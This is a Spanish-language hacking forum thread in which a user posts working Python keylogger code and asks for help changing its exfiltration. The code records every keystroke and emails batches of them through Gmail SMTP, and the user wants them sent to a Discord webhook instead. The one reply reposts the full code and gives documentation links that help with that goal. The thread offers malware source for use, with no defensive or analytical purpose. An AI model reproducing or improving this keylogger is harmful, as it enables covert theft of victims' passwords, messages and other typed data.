elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Ayuda con Keylogger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con Keylogger  (Leído 2,239 veces)
S4ur1k

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Ayuda con Keylogger
« en: 5 Abril 2020, 03:00 am »

Tengo el siguiente Keylogger, es capaz de enviar las pulsaciones a través del protocolo SMTP a una cuenta de GMAIL, en vez de usar dicho protocolo, quiero hacer que las pulsaciones sean enviadas a una Webhook del sitio Discord, usando la librería import discord_webhook.

¿Alguien puede ayudarme?

Código:

Código
  1. import keyboard as key
  2.  
  3. from email.mime.multipart import MIMEMultipart
  4. from email.mime.text import MIMEText
  5. import smtplib
  6.  
  7. import datetime
  8.  
  9. Text = ""
  10.  
  11. while True:
  12.    Recorded = str(key.read_event())
  13.  
  14.    if Recorded.__contains__('up'):
  15.        Recorded = Recorded.replace('KeyboardEvent(', '')
  16.        Recorded = Recorded.replace(' up)', '')
  17.  
  18.        if (len(Recorded)>1):
  19.            Text = Text + " " + Recorded + " "
  20.        else:
  21.            Text = Text + Recorded
  22.  
  23.    if (len(Text)>=100):
  24.        try:
  25.            msg = MIMEMultipart()
  26.  
  27.            password=""
  28.            msg['From']=""
  29.            msg['To']=""
  30.            msg['Subject']="Report "+ str(datetime.datetime.now().date())
  31.  
  32.            msg.attach(MIMEText(Text, 'plain'))
  33.  
  34.            server = smtplib.SMTP('smtp.gmail.com: 587')
  35.            server.starttls()
  36.  
  37.            server.login(msg['From'], password)
  38.  
  39.            server.sendmail(msg['From'], msg['To'], msg.as_string())
  40.  
  41.            server.quit()
  42.  
  43.            Text=""
  44.  
  45.  
  46.        except:
  47.            print("Error")


Mod: Obligatorio el uso de etiquetas GeSHi para codigo.


« Última modificación: 5 Abril 2020, 17:16 pm por #!drvy » En línea

fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: Ayuda con Keylogger
« Respuesta #1 en: 5 Abril 2020, 09:09 am »

Buenos dias,

Estás usando ¿Python? ( o al menos eso creo :rolleyes:). No sé que funciones de  Windows usa la libreria que usas para detectar teclas, pero en caso de que no use las funciones de hook del sistema puede que se te escapen muchísimas teclas  :xD Capaz le puedes hechar un ojo y ver a que funciones llama.

Por otro lado creo que tienes la documentación necesaria aquí (En caso de que sea Python) referente a Discord_WebHook:

https://pypi.org/project/Discord-Webhooks/

Windows hook: https://docs.microsoft.com/en-us/windows/win32/winmsg/hooks

Espero haberte ayudado en algo.

PD: Por favor utiliza las etiquetas de código para los códigos, los hacen mas leibles, fijate la diferencia.

Código
  1. import keyboard as key
  2.  
  3. from email.mime.multipart import MIMEMultipart
  4. from email.mime.text import MIMEText
  5. import smtplib
  6.  
  7. import datetime
  8.  
  9. Text = ""
  10.  
  11. while True:
  12.    Recorded = str(key.read_event())
  13.  
  14.    if Recorded.__contains__('up'):
  15.        Recorded = Recorded.replace('KeyboardEvent(', '')
  16.        Recorded = Recorded.replace(' up)', '')
  17.  
  18.        if (len(Recorded)>1):
  19.            Text = Text + " " + Recorded + " "
  20.        else:
  21.            Text = Text + Recorded
  22.  
  23.    if (len(Text)>=100):
  24.        try:
  25.            msg = MIMEMultipart()
  26.  
  27.            password=""
  28.            msg['From']=""
  29.            msg['To']=""
  30.            msg['Subject']="Report "+ str(datetime.datetime.now().date())
  31.  
  32.            msg.attach(MIMEText(Text, 'plain'))
  33.  
  34.            server = smtplib.SMTP('smtp.gmail.com: 587')
  35.            server.starttls()
  36.  
  37.            server.login(msg['From'], password)
  38.  
  39.            server.sendmail(msg['From'], msg['To'], msg.as_string())
  40.  
  41.            server.quit()
  42.  
  43.            Text=""
  44.  
  45.  
  46.        except:
  47.            print("Error")



En línea

Un byte a la izquierda.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Keylogger en VB ayuda
Programación Visual Basic
Za3LoT 8 3,074 Último mensaje 8 Julio 2008, 05:38 am
por kabruxis
Ayuda kon Keylogger « 1 2 »
Programación Visual Basic
cherembo 18 5,316 Último mensaje 6 Octubre 2006, 15:57 pm
por cherembo
Necesito ayuda para crear Keylogger con VB6.0 [Ayuda]
Programación Visual Basic
Anonx 1 2,697 Último mensaje 4 Diciembre 2012, 20:41 pm
por WIитX
Ayuda al cifrar mi keylogger
Análisis y Diseño de Malware
KyngQlq 4 30,565 Último mensaje 17 Septiembre 2021, 10:05 am
por xxxposeidonxxx
ayuda con keylogger
Análisis y Diseño de Malware
el_hacker1724 3 4,045 Último mensaje 25 Octubre 2021, 11:34 am
por Usuario887
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines